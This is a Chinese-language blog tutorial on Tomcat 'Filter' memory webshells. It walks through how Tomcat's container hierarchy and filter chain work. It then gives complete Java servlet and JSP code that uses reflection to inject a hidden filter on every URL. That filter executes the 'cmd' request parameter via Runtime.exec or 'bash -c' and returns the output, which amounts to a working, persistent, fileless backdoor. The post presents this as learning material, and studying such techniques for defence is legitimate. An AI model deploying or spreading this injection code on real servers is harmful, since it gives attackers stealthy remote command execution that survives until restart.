初识Tomcat Filter内存马

序言

在平时学习过程和之前护网时候一直都有听到内存马相关的事情,只知道云云,这次来详细学习一下。

Tomcat 与 Servlet

Tomcat是Web服务器,是一个Servlet容器,能够将用户的请求发送给Servlet,并且将Servlet的响应返回给用户。Tomcat有4种类型的Servlet容器,分别如下

1
2
3
4
1. Engine,实现类为 org.apache.catalina.core.StandardEngine。最顶层容器的组件,可包含多个Host
2. Host,实现类为 org.apache.catalina.core.StandardHost。一个Host代表一个虚拟主机,可包含多个Context。
3. Context,实现类为 org.apache.catalina.core.StandardContext。一个Context表示一个具体的Web应用,可包含多个Wrapper。
4. Wrapper,实现类为org.apache.catalina.core.StandardWrapper。一个Wrapper表示一个Servlet

每个Wrapper实例都表示一个具体的Servlet定义,StandardWrapper主要任务就是载入Servlet类并且实例化.

image-20210826160357761

在Tomcat中,每个Host下都可以有很多Context(Host的子容器),而每个Context又都可以表示一个具体的Web应用,在一个Context中可以有多个Wrapper.

Wrapper主要就是负责管理Servlet,包括Servlet的装载、初始化、执行以及资源回收等操作。

image-20210826160457932

Filter内存马

Tomcat内存马主要有三种:Filter型、Servlet型、Listener型

本文围绕Filter型展开描述

Filter过滤器可根据自定义来达到用户的一些请求拦截和修改等操作

参考链接:https://paper.seebug.org/1441/#1jsp-webshell

image-20210826160737408

可以发现请求是先经过filter过滤器处理后才到达servlet,那么如果动态创建一个filter,放置恶意代码就能达到注入webshell的目的。

而针对同一目标的多个Filter组成一个Filter链。

注册Filter

自定义一个filter

image-20210826160838464

创建路由

image-20210826161013229

添加web.xml

image-20210826160908472

当去访问/filter时候触发了doFilter

image-20210826160933032

根据输出的可以看出是Filter先收到请求,然后转发给Servlet,再转回给Filter做doFilter

ServletContext

javax.servlet.ServletContext规定了一个ServletContext接口,它提供了Web应用所有的Servlet视图,可以通过它对Web应用进行资源访问。在Web容器启动时,会为每个Web应用创建一个ServletContext,代表着当前Web应用,并且被所有客户端共享。

可通过如下两种方法获得ServletContext

image-20210826161131621

实际上ServletContext创建的对象是ApplicationContextFacade,也就是说它是ApplicationContextFacade的一个封装。

image-20210826161157250

Filter链分析

先将tomcat导入IDEA,便于调试

在doFilter中插入webshell,就能动态的执行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
       System.out.println("Filter Work");
       //webshell
       
       if (servletRequest.getParameter("cmd") != null){
           Process exec = Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
           InputStream inputStream = exec.getInputStream();
           Scanner scanner = new Scanner(inputStream).useDelimiter("\\A");
           String output = scanner.hasNext() ? scanner.next() : "";
           servletResponse.getWriter().write(output);
           servletResponse.getWriter().flush();
       }
       filterChain.doFilter(servletRequest,servletResponse);

        
   }

image-20210826161333908

每执行一次,doFilter都工作一次

image-20210826161402591

过滤器中下断点

进入到 ApplicationFilterChain#doFilter()

image-20210826161422214

这里会用getFilter从filterConfig获取一个Filter对象,然后对这个对象进行doFilter调用

image-20210826161454086

我们根据调用栈来回溯分析

image-20210826161520690

org.apache.catalina.core.StandardWrapperValve#invoke调用了doFilter

image-20210826161540372

往上看filterChain是通过createFilterChain创建的一条过滤链

image-20210826161558142

跟进createFilterChain

image-20210826161615209

会利用context.findFilterMaps() 来返回一个FilterMap数组

再往下会遍历FilterMap,判断URL匹配和context中是否存在filter实例,若实例存在则会利用addFilter方法添加到filterChain中

image-20210826161640229

那么filter的实例存储在什么地方呢?

其实filter内存马的注入过程与web.xml的配置信息是一一相关的

image-20210826161659227

filterDefs存放filter的定义,对应web.xml的如下

image-20210826161727359

filterConfigs存放了filterDefs和filter对象信息,保存着当前生命周期的context对象

image-20210826161748235

filterMaps则对应web.xml中的urlpattern

image-20210826161819803

综上所述,我们要实现filter内存马需要经过如下步骤:

1
2
3
4
5
6
7
1.创建恶意filter

2.用filterDef对filter进行封装

3.将filterDef添加进filterDefs和filterConfigs

4.创建一个新的filterMap将URL与filter绑定(filter生效有先后顺序,添加到FilterChain第一位)

这样我们每次请求时CreateFilterChain都会创建一个新的Filter过滤链,在tomcat本生命周期内StandardContext就能一直保存,即内存马驻留。

Filter内存马实现

根据上述的思路步骤,可以利用反射来动态创建恶意filter并打入filterDefs和filterConfigs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
package com.example.Filter;

import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import javax.servlet.*;
import javax.servlet.http.*;
import javax.servlet.annotation.*;
import java.util.Map;
import java.util.Scanner;

@WebServlet(name = "helloServlet", value = "/filter")
public class HelloServlet extends HttpServlet {
    private String message;

    public void init() {
        System.out.println("I'm Servlet");
    }
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException{
        response.setContentType("text/html");
        // Hello
        message = "I'm Servlet";
        response.getWriter().write(message);


        Field Configs = null;
        Map filterConfigs;
        try {
            //这里是反射获取ApplicationContext的context,也就是standardContext
            ServletContext servletContext = request.getSession().getServletContext();

            Field appctx = servletContext.getClass().getDeclaredField("context");
            appctx.setAccessible(true);
            ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

            Field stdctx = applicationContext.getClass().getDeclaredField("context");
            stdctx.setAccessible(true);
            StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);


            //创建恶意filter
            String FilterName = "cmd_Filter";
            Configs = standardContext.getClass().getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            filterConfigs = (Map) Configs.get(standardContext);

            if (filterConfigs.get(FilterName) == null){
                Filter filter = new Filter() {

                    @Override
                    public void init(FilterConfig filterConfig) throws ServletException {

                    }

                    @Override
                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                        HttpServletRequest req = (HttpServletRequest) servletRequest;
                        if (req.getParameter("cmd") != null){

                            InputStream in = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
//
                            Scanner s = new Scanner(in).useDelimiter("\\A");
                            String output = s.hasNext() ? s.next() : "";
                            servletResponse.getWriter().write(output);

                            return;
                        }
                        filterChain.doFilter(servletRequest,servletResponse);
                    }

                    @Override
                    public void destroy() {

                    }
                };
                //反射获取FilterDef,设置filter名等参数后,调用addFilterDef将FilterDef添加
                Class<?> FilterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef");
                Constructor declaredConstructors = FilterDef.getDeclaredConstructor();
                FilterDef o = (FilterDef)declaredConstructors.newInstance();
                o.setFilter(filter);
                o.setFilterName(FilterName);
                o.setFilterClass(filter.getClass().getName());
                standardContext.addFilterDef(o);

                //反射获取FilterMap并且设置拦截路径,并调用addFilterMapBefore将FilterMap添加进去
                Class<?> FilterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
                Constructor<?> declaredConstructor = FilterMap.getDeclaredConstructor();
                org.apache.tomcat.util.descriptor.web.FilterMap o1 = (org.apache.tomcat.util.descriptor.web.FilterMap)declaredConstructor.newInstance();
                o1.addURLPattern("/*");
                o1.setFilterName(FilterName);
                o1.setDispatcher(DispatcherType.REQUEST.name());
                standardContext.addFilterMapBefore(o1);

                //反射获取ApplicationFilterConfig,构造方法将 FilterDef传入后获取filterConfig后,将设置好的filterConfig添加进去
                Class<?> ApplicationFilterConfig = Class.forName("org.apache.catalina.core.ApplicationFilterConfig");
                Constructor<?> declaredConstructor1 = ApplicationFilterConfig.getDeclaredConstructor(Context.class, org.apache.tomcat.util.descriptor.web.FilterDef.class);
                declaredConstructor1.setAccessible(true);
                org.apache.catalina.core.ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) declaredConstructor1.newInstance(standardContext,o);
                filterConfigs.put(FilterName,filterConfig);
                response.getWriter().write("Filter Success");


            }
        } catch (Exception e) {
            e.printStackTrace();
        }


    }



    public void destroy() {

    }
}

image-20210826162058318

成功注入Filter马后,在任意路由都可传参执行命令

image-20210826162208894

jsp文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%
    final String name = "KpLi0rn";
    ServletContext servletContext = request.getSession().getServletContext();

    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);

    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {

            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                HttpServletRequest req = (HttpServletRequest) servletRequest;
                if (req.getParameter("cmd") != null){
                    byte[] bytes = new byte[1024];
                    Process process = new ProcessBuilder("bash","-c",req.getParameter("cmd")).start();
                    int len = process.getInputStream().read(bytes);
                    servletResponse.getWriter().write(new String(bytes,0,len));
                    process.destroy();
                    return;
                }
                filterChain.doFilter(servletRequest,servletResponse);
            }

            @Override
            public void destroy() {

            }

        };


        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(name);
        filterDef.setFilterClass(filter.getClass().getName());
        /**
         * 将filterDef添加到filterDefs中
         */
        standardContext.addFilterDef(filterDef);

        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/*");
        filterMap.setFilterName(name);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());

        standardContext.addFilterMapBefore(filterMap);

        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        filterConfigs.put(name,filterConfig);
        out.print("Inject Success !");
    }
%>

结尾

java博大精深

参考文章

https://www.cnblogs.com/nice0e3/p/14622879.html#filter%E9%93%BE%E5%88%86%E6%9E%90

http://wjlshare.com/archives/1529

https://mp.weixin.qq.com/s?__biz=MzIxMjEwNTc4NA==&mid=2652991099&idx=1&sn=a6c34bb344f105eb98fc6943c7439331&scene=21#wechat_redirect

https://mp.weixin.qq.com/s/hev4G1FivLtqKjt0VhHKmw

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗